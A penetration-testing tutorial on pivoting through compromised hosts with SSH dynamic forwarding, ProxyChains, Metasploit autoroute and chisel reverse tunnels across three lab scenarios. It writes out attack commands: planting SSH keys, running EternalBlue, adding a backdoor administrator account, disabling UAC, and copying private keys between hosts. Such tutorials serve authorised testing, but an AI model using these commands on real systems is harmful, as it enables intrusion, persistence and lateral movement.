The shades of tunneling
Solution for common pivoting problems during a Penetration Test
by Karol Mazurek
During penetration testing, you may encounter the scenario when you want to be able to pivot through one of the compromised hosts to gain access to other systems in the internal network and continue testing. In this article, you will be guided through 3 scenarios of pivoting and you will learn different tools and techniques that can help you achieve this goal.
SCENARIO I
You had gained root privilege over the Linux Server and conducted a host discovery in the internal network, that only the compromised host has access to. Now you want to pivot through this host. How to do it quickly?
1.1. SSH & PROXYCHAINS
- One way to achieve this goal is by using SSH dynamic port forwarding which establishes a secure channel between an SSH client and SSH server.
- It listens on a local port and anything sent to this port is forwarded through the SSH tunnel to the SSH server which determines where to send the traffic.
- SSH functions as a SOCKS4 or SOCKS5 proxy server.
### ON YOUR MACHINE (10.10.10.1)
# CREATE A DIRECTORY FOR MANAGING KEYS
mkdir piv_keys && chmod 700 piv_keys
# GENERATE NEW SSH KEY
ssh-keygen -f piv_keys/id_rsa_1
# COPY PUBLIC KEY CONTENT TO CLIPBOARD
cat piv_keys/id_rsa_1 | clip.exe # OR JUST CAT AND COPY### ON A COMPROMISED MACHINE (10.10.10.2)
# ADD YOUR SSH PUBLIC KEY TO authorized_keys
echo "ssh-rsa AAAA...[REDACTED]..." >> /root/.ssh/authorized_keys### ON YOUR HOST (10.10.10.1)
# START SSH DYNAMIC PORT FORWARDING
ssh -D 9999 -f -N [email protected] -i piv_keys/id_rsa_1
ON YOUR HOST (10.10.10.1)
# CONFIGURE PROXYCHAINS (/etc/proxychains4.conf)
[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
socks5 127.0.0.1 9999
After adding the above line to the config file, you can start using any tool with proxychains , you can see some examples below:
- When it comes to using
nmap, only TCP Connect Scan (-sT) works. - You can read more about using
nmapoverProxyChainshere. - This way, you can interact with the subnet (
123.123.123.0/24) from your starting host (10.10.10.1) with no need to upload the tools to the jump host (10.10.10.2) and installing them.
How do ProxyChains actually works?
ProxyChains is a UNIX program, that hooks network-related libc functions in dynamically linked programs via a preloaded DLL and redirects the connections through SOCKS4/5 or HTTP proxies.
1. When you create a SSH tunnel between your starting machine (10.10.10.1) and Remote Server (10.10.10.2), to access the internal network (123.123.123.0/24) you additionally open TCP socket on port 9999 locally (127.0.0.1).
2. So now you need to somehow interact with this newly created socket (127.0.0.1:9999)which in fact works as a TCP Proxy Server to access the SSH tunnel between 10.10.10.1 and 10.10.10.2 and here comes the ProxyChains.
3. It connects to 127.0.0.1:9999 and wraps any requests to 10.10.10.1 which is then forwarded by SSH client (10.10.10.1) to SSH server (10.10.10.2).
LIMITATIONS:
ProxyChains works only on dynamically linked programs.
Both ProxyChains and the tool to call must use the same same libc.
You can only use TCP connect technique for port scanning.
1.2. METASPLOIT & AUTOROUTE & PORTFWD
- If you exploit the vulnerable system using Metasploitand establish the meterpreter session, you have the option to use this session to pivot to other systems using
routecommand orautoroutemodule.
### ON YOUR HOST IN MSFCONSOLE (10.10.10.1) # PIVOT USING ROUTE COMMAND route add 123.123.123.0/24 2 # PIVOT USING AUTOROUTE use post/multi/manage/autoroute set session 2 run # PIVOT USING AUTOROUTE IN METERPRETER SESSION meterpreter> run autoroute -s 123.123.123.0/24 meterpreter> run autoroute -p
- Now Metasploit modules will “automagically” pivot through the compromised host and the target systems on the internal network (
123.123.123.0/24). - For example, you found that
123.123.123.4is vulnerable to MS17–010 EternalBlue. To exploit this vuln, just run the proper module and set things up, like the target system is in your subnet:
### ON YOUR HOST IN MSFCONSOLE (10.10.10.1) # EXPLOIT MS17–010 EternalBlue use exploit/windows/smb/ms17_010_psexec set LHOST 10.10.10.1 set RHOST 123.123.123.4 run
- Another example, if you want to conduct TCP Connect Scan over the subnet
123.123.123.0/24:
ON YOUR HOST IN MSFCONSOLE (10.10.10.1)
# CONDUCT TCP CONNECT SCAN
use auxiliary/scanner/portscan/tcp
set RHOSTS 123.123.123.0/24
set PORTS 1-1024
set THREADS 50
run
- If you want to connect with RDP using Metasploit Framework as a tunnel:
METASPLOIT TUNNEL FROM LOCALHOST TO 123.123.123.1 FOR RDP
portfwd add –l 3389 –p 3389 –r 123.123.123.1
### CONNECT USING TUNNEL
rdesktop 127.0.0.1:3389
SCENARIO II
You had managed to pivot through a compromised host (123.123.123.2) and gained a low privileged user CRIMSON\bofer on the Windows Server (123.123.123.3). During the investigation on the newly compromised host, you found that you can leverage the buffer overflow vulnerability, that lies in the printer.exe(service running on 127.0.0.1:4444) for privilege escalation to NT AUTHORITY\SYSTEM . You downloaded the vulnerable printer.exe to your machine, developed an exploit, wonder how to send it from your host (10.10.10.1) to the Windows Server (123.123.123.3) service printer.exe running on the loopback interface (127.0.0.1:4444)?
- This time there is no way to use an SSH server on the target (Windows System
123.123.123.3) since there is no SSH preinstalled and you have no privileges to install it. - In such a situation, it will be a good idea to use
chisel.exethrough a previously established SSH tunnel with ProxyChains for tunneling.
### ON YOUR HOST (10.10.10.1)
# START CHISEL SERVER ON PORT 8000
proxychains chisel server -p 8000 --reverse
# START NETCAT LISTENER ON PORT 4000
nc -nlvp 4000### ON A COMPROMISED MACHINE (123.123.123.3)
# START CHISEL CLIENT
chisel.exe client 10.10.10.1:8000 R:4000:127.0.0.1:4444
- Now if you want to exploit buffer overflow on the vulnerable service available only on
127.0.0.1:4444for the123.123.123.3from your machine (10.10.10.1), you have to run a developed exploit against10.10.10.1:4000on your host.
SCENARIO III
You had gained NT AUTHORITY\SYSTEM on another Windows Server (123.123.123.4) through MS17–010 EternalBlue and during the post-exploitation pillaging acquire a piece of information from the browser history of the user CRIMSON\karmaz that he was connecting to a website http://123.123.124.2:80/blog . That is why you conduct a host discovery of adjacent network segment (123.123.124.0/24). You have found one, new host from this subnet: 123.123.124.3. Now, how to proxy traffic to this newly found host from your starting machine (10.10.10.1)?
3.1. OpenSSH & PROXYCHAINS
- Since you got
NT AUTHORITY\SYSTEMyou can install anything you want on the compromised Windows Server. - In such a scenario OpenSSH comes in handy, install it if it is not available.
### ON COMPROMISED HOST USING METERPRETER SESSION (123.123.123.4)
## GUIDE USING RDP:
# TURN ON RDP ON THE COMPROMISED MACHINE
run getgui -e
# ADD USER IF THERE ARE NON
run getgui -u karmazRDP -p karmaz!RDP123
# USER SHOULD BE IN ADMINISTRATOR GROUP, IF NOT - ADD HIM
shell
net localgroup administrators karmazRDP /add### ON YOUR HOST (10.10.10.1)
# CONNECT OVER PROXYCHAINS & RDP USING PREVIOUS TUNNEL
proxychains xfreerdp /u:DOMAIN\\karmazRDP /p:karmaz\!RDP123 /v:10.10.10.1### ON COMPROMISED HOST USING RDP WINDOW
# DOWNLOAD latest release of OpenSSH: LINK
# INSTALL OpenSSH instructions: LINK
# GENERATE NEW KEY PAIR
ssh-keygen
# START SSH AGENT & ADD NEW IDENTITY
Start-Service ssh-agent
ssh-add C:\Users\karmazRDP\.ssh\id_rsa
# ADD PUBLIC KEY TO authorized_keys
copy content of ~\.ssh\id_rsa.pub
add it to C:\ProgramData\ssh\administrators_authorized_keys
- The tricky part is, if the user you logged in via SSH client is part of the local Administrator group, then his public key has to be added to
C:\ProgramData\ssh\administrators_authorized_keysnot to the
C:\Users\<username>\.ssh\authorized_keys. - Another common problem is wrong permissions set on the file and you can mitigate this using the below PowerShell script:
$acl = Get-Acl C:\ProgramData\ssh\administrators_authorized_keys
$acl.SetAccessRuleProtection($true, $false)
$administratorsRule = New-Object system.security.accesscontrol.filesystemaccessrule("Administrators","FullControl","Allow")
$systemRule = New-Object system.security.accesscontrol.filesystemaccessrule("SYSTEM","FullControl","Allow")
$acl.SetAccessRule($administratorsRule)
$acl.SetAccessRule($systemRule)
$acl | Set-Acl
- If you want to install OpenSSH from the command line, even if you are
NT AUTHORITY\SYSTEMyou have to switch off UAC because it will pop up a message window that you cannot handle from the command line.
## GUIDE USING COMMAND LINE (WITHOUT RDESKTOP)
# SET UAC TO 0
C:\Windows\System32\cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
# REBOOT THE SYSTEM
shutdown /r
# RENEW THE METERPRETER SESSION AND FOLLOW THE RDP STEPS FROM ABOVE
- Now to set a tunnel from
10.10.10.1over10.10.10.2and over123.123.123.4to the123.123.124.0/24subnet, you have to use the same private key on the10.10.10.1and10.10.10.2which corresponding public key is added to the authorized_keys on the123.123.123.4.
### ON THE SECOND JUMP HOST - 123.123.123.4
Copy private key i.e. content of ~\.ssh\id_rsa### ON THE FIRST JUMP HOST - 10.10.10.2
# MAKE A BACKUP OF OLD ROOT PRIVATE KEY AND PUBLIC KEY
cp /root/.ssh/id_rsa /root/.ssh/id_rsa.bck
cp /root/.ssh/id_rsa.pub /root/.ssh/id_rsa.pub.bck
# MAKE NEW PRIVATE KEY FILE AND NAME IT id_rsa
# PASTE THE COPIED PRIVATE KEY FROM 123.123.123.4 IN ~/.ssh/id_rsa
# SET CORRECT PERMISSIONS
chmod 600 /root/.ssh/id_rsa
# CREATE NEW PUBLIC KEY
ssh-keygen -y -f /root/.ssh/id_rsa > /root/.ssh/id_rsa.pub### ON THE STARTING HOST - 10.10.10.1
# MAKE A BACKUP OF OLD ROOT PRIVATE KEY AND PUBLIC KEY
cp ~/.ssh/id_rsa ~/.ssh/id_rsa.bck
cp ~/.ssh/id_rsa.pub ~/.ssh/id_rsa.pub.bck
# PASTE THE COPIED PRIVATE KEY FROM 123.123.123.4 IN ~/.ssh/id_rsa
# SET CORRECT PERMISSIONS
chmod 600 ~/.ssh/id_rsa
# CREATE NEW PUBLIC KEY
ssh-keygen -y -f ~/.ssh/id_rsa > ~/.ssh/id_rsa.pub
# CREATE A TUNNEL
ssh -J [email protected] DOMAIN/[email protected] -N -f -D 9999
- The reason why you have to generate a new public key is if it belongs to a different identity file, then the SSH client will not initiate the connection.
- Now you can use this tunnel via ProxyChains as before in scenario 1 and packets will be tunneled from the starting machine (
10.10.10.1) to any host in the123.123.124.0/24subnet.
3.2. CHISEL & PROXYCHAINS
- The above example with OpenSSH is more persistent and stable, but it takes more time to set up and administrator privileges are needed if the sshd is not preinstalled and enabled.
- A quick way to achieve the same goal could be to set up SOCKS Proxies with
chisel.exeandchisel.elf.
### ON STARTING HOST
# BUILD chisel.elf FOR FIRST JUMP HOST - 10.10.10.2
GOOS=linux GOARCH=amd64 go build -ldflags="-s -w" .
# BUILD chisel.exe FOR SECOND JUMP HOST - 10.10.10.2
GOOS=windows GOARCH=386 go build -ldflags="-s -w" .
# UPLAOD chisels TO FIRST JUMP HOST - 10.10.10.2
scp chisel [email protected]:/root/chisel
scp chisel.exe [email protected]:/root/chisel.exe
# OR DONWLOAD APPROPRIATE VERSION FROM RELEASE PAGE
https://github.com/jpillora/chisel/releases
# START THE CHISEL SERVER
./chisel server --socks5 --reverse -p 9001### ON THE FIRST JUMPHOST - 10.10.10.2
# CONNECT TO THE SERVER AND START REMOTE REVERSE ON 9998
./chisel client 10.10.10.1:9001 R:9998:socks &
# START THE CHISEL SERVER FOR SECOND JUMPHOST - 123.123.123.4
./chisel server --socks5 --reverse -p 9002### ON THE SECOND JUMPHOST - 123.123.123.4
# UPLOAD chisel.exe TO THE SECOND JUMPHOST AND RUN CHISEL CLIENT
.\chisel.exe client 123.123.123.2:9002 R:8888:socks
- At the end edit the ProxyChains configuration file:
- Now you can access the subnet
123.123.123.0/24and the subnet123.123.124.0/24from your starting host10.10.10.1using ProxyChains
3.3. METASPLOIT & AUTOROUTE
- You can use Metasploit if you managed to establish the meterpreter session with the (
123.123.123.4). - You have the option to use this session for the second pivot to gain access to systems in the
123.123.124.0/24subnet.
### ON YOUR HOST IN MSFCONSOLE (10.10.10.1)
# PIVOT USING ROUTE COMMAND
route add 123.123.124.0/24 3
# PIVOT USING AUTOROUTE
use post/multi/manage/autoroute
set session 3
run
# PIVOT USING AUTOROUTE IN METERPRETER SESSION
meterpreter> run autoroute -s 123.123.124.0/24
meterpreter> run autoroute -p
- The Metasploit modules will “automagically” pivot through the (
123.123.123.2) and then through (123.123.124.1) to access the internal network (123.123.124.0/24).
